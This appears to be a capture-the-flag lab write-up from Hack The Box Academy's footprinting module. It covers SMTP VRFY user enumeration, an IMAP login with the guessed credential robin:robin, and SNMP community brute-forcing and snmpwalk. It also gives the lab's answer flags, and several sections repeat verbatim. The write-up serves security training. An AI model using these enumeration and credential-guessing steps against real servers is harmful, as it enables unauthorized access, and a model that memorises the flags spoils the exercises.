 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] heather     550 5.1.1 <heather>: Recipient address rejected: User unknown in local recipient table
 [Reconn 1/3] [Retry 1/5] Testing: VRFY rachel ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] rachel      550 5.1.1 <rachel>: Recipient address rejected: User unknown in local recipient table

root@htb:~$  smtp-user-enum -m VRFY -u robin -V 10.129.221.54 25 | grep -v rejected
 Connecting to 10.129.221.54 25 ...
 [1/4] Connecting to 10.129.221.54:25 ...
 [1/4] Waiting for banner ...
 220 InFreight ESMTP v2.11
 [1/4] Sending greeting: HELO changeme
 [1/4] Waiting for greeting reply ...
 250 mail1
 Start enumerating users with VRFY mode ...
 [Reconn 1/3] [Retry 1/5] Testing: VRFY robin ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] robin 252 2.0.0 robin

 * -m refers to mode
    - VRFY is used to enumerate existing users on the system
 * -U refers to wordlist
 * -V refers to verbose output
 
 
 * robin:robin

root@oco:~$ openssl s_client -connect 10.129.71.178:993 -crlf
 CONNECTED(00000003)
 Can't use SSL_get_servername
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify error:num=18:self-signed certificate
 verify return:1
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify return:1
 ---
 Certificate chain
  0 s:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   i:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  8 23:10:05 2021 GMT; NotAfter: Aug 23 23:10:05 2295 GMT
 ---
 Server certificate
 -----BEGIN CERTIFICATE-----
 MIIEUzCCAzugAwIBAgIUDf35PqFuv6Uv0EECM8dFmNSZoY8wDQYJKoZIhvcNAQEL
 BQAwgbcxCzAJBgNVBAYTAlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxv
 bmRvbjEaMBgGA1UECgwRSW5sYW5lRnJlaWdodCBMdGQxHDAaBgNVBAsME0Rldk9w
 cyBEZXDDg2FydG1lbnQxHjAcBgNVBAMMFWRldi5pbmxhbmVmcmVpZ2h0Lmh0YjEs
 MCoGCSqGSIb3DQEJARYdY3RvLmRldkBkZXYuaW5sYW5lZnJlaWdodC5odGIwIBcN
 MjExMTA4MjMxMDA1WhgPMjI5NTA4MjMyMzEwMDVaMIG3MQswCQYDVQQGEwJVSzEP
 MA0GA1UECAwGTG9uZG9uMQ8wDQYDVQQHDAZMb25kb24xGjAYBgNVBAoMEUlubGFu
 ZUZyZWlnaHQgTHRkMRwwGgYDVQQLDBNEZXZPcHMgRGVww4NhcnRtZW50MR4wHAYD
 VQQDDBVkZXYuaW5sYW5lZnJlaWdodC5odGIxLDAqBgkqhkiG9w0BCQEWHWN0by5k
 ZXZAZGV2LmlubGFuZWZyZWlnaHQuaHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
 MIIBCgKCAQEAxvMwFE6m+iBUSujb5d6DUy1xDYR5awzQRwddyvq6iBrMxbnptSrn
 +j0UOKWHCOpD5LREwP26ghUg0lVJzfo+v5pQJGnxEXKg0OFlzWEd8xgx/JWW/z1/
 rDsWlNa2yYZkCy68YWJlC7UZxvcDFrI0V0pDJIkrjForw26laoYDkrh1A5F8uUXD
 1TwRLLYo+NGmtNHT3BADJpv6aFUZ4CGrqBQNi7XpsTZ948WLhUwQvWmebiK06Dai
 TvMNKBctjWAiNI4xvq34W9hIUaPxT1JJzuujRslep6nHGHW00QEWTWgyOMYThc3b
 HtKIHMfDLTUMz7s8RhVVwlWE6+ly1DMRgQIDAQABo1MwUTAdBgNVHQ4EFgQUGDTC
 9B5KCKPWT7vXbnMunL/mEE4wHwYDVR0jBBgwFoAUGDTC9B5KCKPWT7vXbnMunL/m
 EE4wDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEADh0v5XWCf3KO
 atrWcoiIOC67Z0ZIO7yEF+fQo8z+Wx1dWzmCFVu7u4+l7slcdJICCGBbOX8eItWS
 chwzgnWJToyX8PWY8lSaB8ifMDQcr457Y7O6NmvgU35sRcLnYYqXzu2oh0lxsFLR
 vL1wpyDLPhhoI++j1fELhiJ3GWiUQrb0vfJPcbSkHTgzf0hm7mLJTaqt3WfS/Gr2
 8Oh7vSfzvqvHLE7HHAO0G5Q81zo+wWsrQF0s40HEF/raEMfOy2Htm79YjyjAlLWf
 ueS+u8rX2smOYdRIpL3UPx7+yZPGu47vYoetde1Z5cfTCgmeS05BQ2qMOp6Tw6+G
 xUuqg8nK1Q==
 -----END CERTIFICATE-----
 subject=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 issuer=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 ---
 No client certificate CA names sent
 Peer signing digest: SHA256
 Peer signature type: RSA-PSS
 Server Temp Key: X25519, 253 bits
 ---
 SSL handshake has read 1667 bytes and written 377 bytes
 Verification error: self-signed certificate
 ---
 New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
 Server public key is 2048 bit
 Secure Renegotiation IS NOT supported
 Compression: NONE
 Expansion: NONE
 No ALPN negotiated
 Early data was not sent
 Verify return code: 18 (self-signed certificate)
 ---
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 83FCF5ADD04511356A55C5E2D2B7980983C318DEA2C1061D3722E6377917B7BD
    Session-ID-ctx: 
    Resumption PSK: 4701843DD0E32CF4C7D26BE5DEC94566773EBB8E24F8704E0D0BC977F96543A7A7E69411065C12A076CB82E1ACEA9EBF
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - ae 3b da b5 ee 74 d8 01-22 39 3e 75 14 82 ad 60   .;...t.."9>u...`
    0010 - b8 73 82 20 fa 0a b3 57-06 41 c9 54 fa d4 96 3c   .s. ...W.A.T...<
    0020 - d3 47 4e 14 50 1f 48 73-d1 c6 23 1f ac be e4 76   .GN.P.Hs..#....v
    0030 - 33 5a f3 cc 46 37 c5 b1-b8 71 03 fe 2e 35 c1 1e   3Z..F7...q...5..
    0040 - f0 ba bf 91 2b 70 aa 15-09 94 9c 58 c4 54 3f 63   ....+p.....X.T?c
    0050 - 86 93 f6 c7 4f 92 cc d0-8c 0d 2a e5 5a 92 2b 51   ....O.....*.Z.+Q
    0060 - d2 81 1d d2 28 82 b5 5a-04 d4 9d a0 ad cc 0e 09   ....(..Z........
    0070 - 1c 74 6d 7f 97 0c 4e 5b-ef 87 79 a2 65 26 a4 7b   .tm...N[..y.e&.{
    0080 - 86 24 b3 4a 1b ed a6 0f-75 2e 49 97 60 60 68 46   .$.J....u.I.``hF
    0090 - b0 24 ac ac ba 23 1b 40-b0 23 f5 24 70 94 bf 3f   .$...#.@.#.$p..?
    00a0 - cc ef f6 d6 b0 0a 0f 47-a0 ac f5 82 fa c1 ef 0c   .......G........
    00b0 - 4c 61 ec e8 b3 fa 73 7d-ca cd 01 ac 2a d3 79 23   La....s}....*.y#

    Start Time: 1760926467
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: FF4DDC2C14B72130E13F062EE759480B6B61C14B777451477DD7C69CAF5F698C
    Session-ID-ctx: 
    Resumption PSK: D860B63BB8744526E001552ED44E6225AF95E3BCB0BD7EDCD55472E56A8EAA7066CE91B573D92926A0DCFBF3C1307BC8
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - ae 3b da b5 ee 74 d8 01-22 39 3e 75 14 82 ad 60   .;...t.."9>u...`
    0010 - 3d e1 90 d8 45 13 38 b7-d9 82 8e e6 48 96 c1 e7   =...E.8.....H...
    0020 - 7e 4f 5f 2b 3f 9f f6 4c-1f 8f fa 53 80 90 b9 5d   ~O_+?..L...S...]
    0030 - 9e 00 81 14 14 3b fe c5-30 d6 b3 fd b0 18 e0 d1   .....;..0.......
    0040 - d0 38 9d ba ce 7a d3 a0-55 f3 2f 5b 68 15 09 6b   .8...z..U./[h..k
    0050 - 56 30 89 20 5d 34 13 9b-17 d9 0c 10 94 48 c5 08   V0. ]4.......H..
    0060 - c8 55 8c a4 11 ab 47 2d-f1 b5 b6 1f b9 33 9e ac   .U....G-.....3..
    0070 - a7 e8 7f e1 df c4 e2 bc-bf a7 93 ae 03 c9 51 06   ..............Q.
    0080 - ec 6b 57 52 ce 07 54 93-37 c1 3e a0 e5 1d 2f d1   .kWR..T.7.>.../.
    0090 - 42 f4 e9 32 c5 22 59 c7-42 d5 8c 6a 7c cf 86 a2   B..2."Y.B..j|...
    00a0 - 5c 92 43 2c 03 31 03 fc-2f 53 7f 9b 05 85 b8 63   \.C,.1../S.....c
    00b0 - 87 ac 71 11 d2 2f 86 de-ee 5f f6 7f 33 4c a9 af   ..q../..._..3L..

    Start Time: 1760926467
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] HTB{roncfbw7iszerd7shni7jr2343zhrj}
 
 * Use -crlf so OpenSSL sends CRLF line endings the server expects.

a001 LOGIN robin robin
 a001 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in

a002 LIST "" *
 * LIST (\Noselect \HasChildren) "." DEV
 * LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
 * LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
 * LIST (\HasNoChildren) "." INBOX
 a002 OK List completed (0.001 + 0.000 secs).
 
1 SELECT DEV.DEPARTMENT.INT
 * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
 * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
 * 1 EXISTS
 * 0 RECENT
 * OK [UIDVALIDITY 1636414279] UIDs valid
 * OK [UIDNEXT 2] Predicted next UID
 1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
 
1 FETCH 1 ALL
 * 1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
 1 OK Fetch completed (0.001 + 0.000 secs).

Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

root@htb:~$ which smtp-user-enum 
 /usr/bin/smtp-user-enum
 
root@htb:~$ curl -O https://academy.hackthebox.com/storage/resources/Footprinting-wordlist.zip
root@htb:~$ unzip Footprinting-wordlist.zip
 
root@htb:~$ smtp-user-enum -m VRFY -U footprinting-wordlist.txt -V 10.129.221.54 25
 [Reconn 1/3] [Retry 1/5] Testing: VRFY heather ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] heather     550 5.1.1 <heather>: Recipient address rejected: User unknown in local recipient table
 [Reconn 1/3] [Retry 1/5] Testing: VRFY rachel ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] rachel      550 5.1.1 <rachel>: Recipient address rejected: User unknown in local recipient table

root@htb:~$  smtp-user-enum -m VRFY -u robin -V 10.129.221.54 25 | grep -v rejected
 Connecting to 10.129.221.54 25 ...
 [1/4] Connecting to 10.129.221.54:25 ...
 [1/4] Waiting for banner ...
 220 InFreight ESMTP v2.11
 [1/4] Sending greeting: HELO changeme
 [1/4] Waiting for greeting reply ...
 250 mail1
 Start enumerating users with VRFY mode ...
 [Reconn 1/3] [Retry 1/5] Testing: VRFY robin ...
 [Reconn 1/3] [Retry 1/5] Waiting for answer ...
 [----] robin 252 2.0.0 robin

 * -m refers to mode
    - VRFY is used to enumerate existing users on the system
 * -U refers to wordlist
 * -V refers to verbose output
 
 
 * robin:robin

root@oco:~$ openssl s_client -connect 10.129.71.178:993 -crlf
 CONNECTED(00000003)
 Can't use SSL_get_servername
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify error:num=18:self-signed certificate
 verify return:1
 depth=0 C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 verify return:1
 ---
 Certificate chain
  0 s:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   i:C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
   a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
   v:NotBefore: Nov  8 23:10:05 2021 GMT; NotAfter: Aug 23 23:10:05 2295 GMT
 ---
 Server certificate
 -----BEGIN CERTIFICATE-----
 MIIEUzCCAzugAwIBAgIUDf35PqFuv6Uv0EECM8dFmNSZoY8wDQYJKoZIhvcNAQEL
 BQAwgbcxCzAJBgNVBAYTAlVLMQ8wDQYDVQQIDAZMb25kb24xDzANBgNVBAcMBkxv
 bmRvbjEaMBgGA1UECgwRSW5sYW5lRnJlaWdodCBMdGQxHDAaBgNVBAsME0Rldk9w
 cyBEZXDDg2FydG1lbnQxHjAcBgNVBAMMFWRldi5pbmxhbmVmcmVpZ2h0Lmh0YjEs
 MCoGCSqGSIb3DQEJARYdY3RvLmRldkBkZXYuaW5sYW5lZnJlaWdodC5odGIwIBcN
 MjExMTA4MjMxMDA1WhgPMjI5NTA4MjMyMzEwMDVaMIG3MQswCQYDVQQGEwJVSzEP
 MA0GA1UECAwGTG9uZG9uMQ8wDQYDVQQHDAZMb25kb24xGjAYBgNVBAoMEUlubGFu
 ZUZyZWlnaHQgTHRkMRwwGgYDVQQLDBNEZXZPcHMgRGVww4NhcnRtZW50MR4wHAYD
 VQQDDBVkZXYuaW5sYW5lZnJlaWdodC5odGIxLDAqBgkqhkiG9w0BCQEWHWN0by5k
 ZXZAZGV2LmlubGFuZWZyZWlnaHQuaHRiMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
 MIIBCgKCAQEAxvMwFE6m+iBUSujb5d6DUy1xDYR5awzQRwddyvq6iBrMxbnptSrn
 +j0UOKWHCOpD5LREwP26ghUg0lVJzfo+v5pQJGnxEXKg0OFlzWEd8xgx/JWW/z1/
 rDsWlNa2yYZkCy68YWJlC7UZxvcDFrI0V0pDJIkrjForw26laoYDkrh1A5F8uUXD
 1TwRLLYo+NGmtNHT3BADJpv6aFUZ4CGrqBQNi7XpsTZ948WLhUwQvWmebiK06Dai
 TvMNKBctjWAiNI4xvq34W9hIUaPxT1JJzuujRslep6nHGHW00QEWTWgyOMYThc3b
 HtKIHMfDLTUMz7s8RhVVwlWE6+ly1DMRgQIDAQABo1MwUTAdBgNVHQ4EFgQUGDTC
 9B5KCKPWT7vXbnMunL/mEE4wHwYDVR0jBBgwFoAUGDTC9B5KCKPWT7vXbnMunL/m
 EE4wDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEADh0v5XWCf3KO
 atrWcoiIOC67Z0ZIO7yEF+fQo8z+Wx1dWzmCFVu7u4+l7slcdJICCGBbOX8eItWS
 chwzgnWJToyX8PWY8lSaB8ifMDQcr457Y7O6NmvgU35sRcLnYYqXzu2oh0lxsFLR
 vL1wpyDLPhhoI++j1fELhiJ3GWiUQrb0vfJPcbSkHTgzf0hm7mLJTaqt3WfS/Gr2
 8Oh7vSfzvqvHLE7HHAO0G5Q81zo+wWsrQF0s40HEF/raEMfOy2Htm79YjyjAlLWf
 ueS+u8rX2smOYdRIpL3UPx7+yZPGu47vYoetde1Z5cfTCgmeS05BQ2qMOp6Tw6+G
 xUuqg8nK1Q==
 -----END CERTIFICATE-----
 subject=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 issuer=C = UK, ST = London, L = London, O = InlaneFreight Ltd, OU = DevOps Dep\C3\83artment, CN = dev.inlanefreight.htb, emailAddress = [email protected]
 ---
 No client certificate CA names sent
 Peer signing digest: SHA256
 Peer signature type: RSA-PSS
 Server Temp Key: X25519, 253 bits
 ---
 SSL handshake has read 1667 bytes and written 377 bytes
 Verification error: self-signed certificate
 ---
 New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
 Server public key is 2048 bit
 Secure Renegotiation IS NOT supported
 Compression: NONE
 Expansion: NONE
 No ALPN negotiated
 Early data was not sent
 Verify return code: 18 (self-signed certificate)
 ---
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: 83FCF5ADD04511356A55C5E2D2B7980983C318DEA2C1061D3722E6377917B7BD
    Session-ID-ctx: 
    Resumption PSK: 4701843DD0E32CF4C7D26BE5DEC94566773EBB8E24F8704E0D0BC977F96543A7A7E69411065C12A076CB82E1ACEA9EBF
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - ae 3b da b5 ee 74 d8 01-22 39 3e 75 14 82 ad 60   .;...t.."9>u...`
    0010 - b8 73 82 20 fa 0a b3 57-06 41 c9 54 fa d4 96 3c   .s. ...W.A.T...<
    0020 - d3 47 4e 14 50 1f 48 73-d1 c6 23 1f ac be e4 76   .GN.P.Hs..#....v
    0030 - 33 5a f3 cc 46 37 c5 b1-b8 71 03 fe 2e 35 c1 1e   3Z..F7...q...5..
    0040 - f0 ba bf 91 2b 70 aa 15-09 94 9c 58 c4 54 3f 63   ....+p.....X.T?c
    0050 - 86 93 f6 c7 4f 92 cc d0-8c 0d 2a e5 5a 92 2b 51   ....O.....*.Z.+Q
    0060 - d2 81 1d d2 28 82 b5 5a-04 d4 9d a0 ad cc 0e 09   ....(..Z........
    0070 - 1c 74 6d 7f 97 0c 4e 5b-ef 87 79 a2 65 26 a4 7b   .tm...N[..y.e&.{
    0080 - 86 24 b3 4a 1b ed a6 0f-75 2e 49 97 60 60 68 46   .$.J....u.I.``hF
    0090 - b0 24 ac ac ba 23 1b 40-b0 23 f5 24 70 94 bf 3f   .$...#.@.#.$p..?
    00a0 - cc ef f6 d6 b0 0a 0f 47-a0 ac f5 82 fa c1 ef 0c   .......G........
    00b0 - 4c 61 ec e8 b3 fa 73 7d-ca cd 01 ac 2a d3 79 23   La....s}....*.y#

    Start Time: 1760926467
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 ---
 Post-Handshake New Session Ticket arrived:
 SSL-Session:
    Protocol  : TLSv1.3
    Cipher    : TLS_AES_256_GCM_SHA384
    Session-ID: FF4DDC2C14B72130E13F062EE759480B6B61C14B777451477DD7C69CAF5F698C
    Session-ID-ctx: 
    Resumption PSK: D860B63BB8744526E001552ED44E6225AF95E3BCB0BD7EDCD55472E56A8EAA7066CE91B573D92926A0DCFBF3C1307BC8
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - ae 3b da b5 ee 74 d8 01-22 39 3e 75 14 82 ad 60   .;...t.."9>u...`
    0010 - 3d e1 90 d8 45 13 38 b7-d9 82 8e e6 48 96 c1 e7   =...E.8.....H...
    0020 - 7e 4f 5f 2b 3f 9f f6 4c-1f 8f fa 53 80 90 b9 5d   ~O_+?..L...S...]
    0030 - 9e 00 81 14 14 3b fe c5-30 d6 b3 fd b0 18 e0 d1   .....;..0.......
    0040 - d0 38 9d ba ce 7a d3 a0-55 f3 2f 5b 68 15 09 6b   .8...z..U./[h..k
    0050 - 56 30 89 20 5d 34 13 9b-17 d9 0c 10 94 48 c5 08   V0. ]4.......H..
    0060 - c8 55 8c a4 11 ab 47 2d-f1 b5 b6 1f b9 33 9e ac   .U....G-.....3..
    0070 - a7 e8 7f e1 df c4 e2 bc-bf a7 93 ae 03 c9 51 06   ..............Q.
    0080 - ec 6b 57 52 ce 07 54 93-37 c1 3e a0 e5 1d 2f d1   .kWR..T.7.>.../.
    0090 - 42 f4 e9 32 c5 22 59 c7-42 d5 8c 6a 7c cf 86 a2   B..2."Y.B..j|...
    00a0 - 5c 92 43 2c 03 31 03 fc-2f 53 7f 9b 05 85 b8 63   \.C,.1../S.....c
    00b0 - 87 ac 71 11 d2 2f 86 de-ee 5f f6 7f 33 4c a9 af   ..q../..._..3L..

    Start Time: 1760926467
    Timeout   : 7200 (sec)
    Verify return code: 18 (self-signed certificate)
    Extended master secret: no
    Max Early Data: 0
 ---
 read R BLOCK
 * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] HTB{roncfbw7iszerd7shni7jr2343zhrj}
 
 * Use -crlf so OpenSSL sends CRLF line endings the server expects.

a001 LOGIN robin robin
 a001 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in

a002 LIST "" *
 * LIST (\Noselect \HasChildren) "." DEV
 * LIST (\Noselect \HasChildren) "." DEV.DEPARTMENT
 * LIST (\HasNoChildren) "." DEV.DEPARTMENT.INT
 * LIST (\HasNoChildren) "." INBOX
 a002 OK List completed (0.001 + 0.000 secs).
 
1 SELECT DEV.DEPARTMENT.INT
 * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
 * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
 * 1 EXISTS
 * 0 RECENT
 * OK [UIDVALIDITY 1636414279] UIDs valid
 * OK [UIDNEXT 2] Predicted next UID
 1 OK [READ-WRITE] Select completed (0.001 + 0.000 secs).
 
1 FETCH 1 ALL
 * 1 FETCH (FLAGS (\Seen) INTERNALDATE "08-Nov-2021 23:51:24 +0000" RFC822.SIZE 167 ENVELOPE ("Wed, 03 Nov 2021 16:13:27 +0200" "Flag" (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("CTO" NIL "devadmin" "inlanefreight.htb")) (("Robin" NIL "robin" "inlanefreight.htb")) NIL NIL NIL NIL))
 1 OK Fetch completed (0.001 + 0.000 secs).
 
1 FETCH 1 BODY[]
 * 1 FETCH (BODY[] {167}
 Subject: Flag
 To: Robin <[email protected]>
 From: CTO <[email protected]>
 Date: Wed, 03 Nov 2021 16:13:27 +0200

 HTB{983uzn8jmfgpd8jmof8c34n7zio}
 )
 1 OK Fetch completed (0.001 + 0.000 secs)

SNMP

Enumerate the SNMP service and obtain the email address of the admin. Submit it as the answer.

root@oco:~$ sudo nmap -sU -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE
 161/udp open          snmp
 162/udp open|filtered snmptrap
 
root@oco:~$ sudo nmap -sU -sV -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE  VERSION
 161/udp open          snmp     SNMPv1 server; net-snmp SNMPv3 server (public)
 162/udp open|filtered snmptrap
 Service Info: Host: NIX02

//community string is unknown; start with onesixtyone
root@oco:~$ find / -name snmp.txt  2>/dev/null
 /usr/share/seclists/Discovery/SNMP/snmp.txt

root@oco:~$ cp /usr/share/seclists/Discovery/SNMP/snmp.txt .
root@oco:~$ onesixtyone -c snmp.txt 10.129.7.216
 Scanning 1 hosts, 3219 communities
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

root@oco:~$ snmpwalk -v2c -c public 10.129.7.216
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (77730) 0:12:57.30
 iso.3.6.1.2.1.1.4.0 = STRING: "devadmin <[email protected]>"
 iso.3.6.1.2.1.1.5.0 = STRING: "NIX02"
 iso.3.6.1.2.1.1.6.0 = STRING: "InFreight SNMP v0.91"
 iso.3.6.1.2.1.1.7.0 = INTEGER: 72
 iso.3.6.1.2.1.1.8.0 = Timeticks: (5) 0:00:00.05
 ...
 iso.3.6.1.2.1.25.1.7.1.2.1.2.4.70.76.65.71 = STRING: "/usr/share/flag.sh"
 iso.3.6.1.2.1.25.1.7.1.2.1.3.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.4.4.70.76.65.71 = ""
 iso.3.6.1.2.1.25.1.7.1.2.1.5.4.70.76.65.71 = INTEGER: 5
 iso.3.6.1.2.1.25.1.7.1.2.1.6.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.7.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.2.1.20.4.70.76.65.71 = INTEGER: 4
 iso.3.6.1.2.1.25.1.7.1.2.1.21.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.1.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.2.4.70.76.65.71 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 iso.3.6.1.2.1.25.1.7.1.3.1.3.4.70.76.65.71 = INTEGER: 1
 iso.3.6.1.2.1.25.1.7.1.3.1.4.4.70.76.65.71 = INTEGER: 0
 iso.3.6.1.2.1.25.1.7.1.4.1.2.4.70.76.65.71.1 = STRING: "HTB{5nMp_fl4g_uidhfljnsldiuhbfsdij44738b2u763g}"
 
 * ALT: braa <community string>@<IP>:.1.3.6.*   # Syntax
        braa [email protected]:.1.3.6.*

What is the customized version of the SNMP server?

root@oco:~$ sudo nmap -sU -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE
 161/udp open          snmp
 162/udp open|filtered snmptrap
 
root@oco:~$ sudo nmap -sU -sV -T4 10.129.7.216 -p 161,162
 PORT    STATE         SERVICE  VERSION
 161/udp open          snmp     SNMPv1 server; net-snmp SNMPv3 server (public)
 162/udp open|filtered snmptrap
 Service Info: Host: NIX02

//community string is unknown; start with onesixtyone
root@oco:~$ find / -name snmp.txt  2>/dev/null
 /usr/share/seclists/Discovery/SNMP/snmp.txt

root@oco:~$ cp /usr/share/seclists/Discovery/SNMP/snmp.txt .
root@oco:~$ onesixtyone -c snmp.txt 10.129.7.216
 Scanning 1 hosts, 3219 communities
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
 10.129.7.216 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64

root@oco:~$ snmpwalk -v2c -c public 10.129.7.216
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (77730) 0:12:57.30
 iso.3.6.1.2.1.1.4.0 = STRING: "devadmin <[email protected]>"
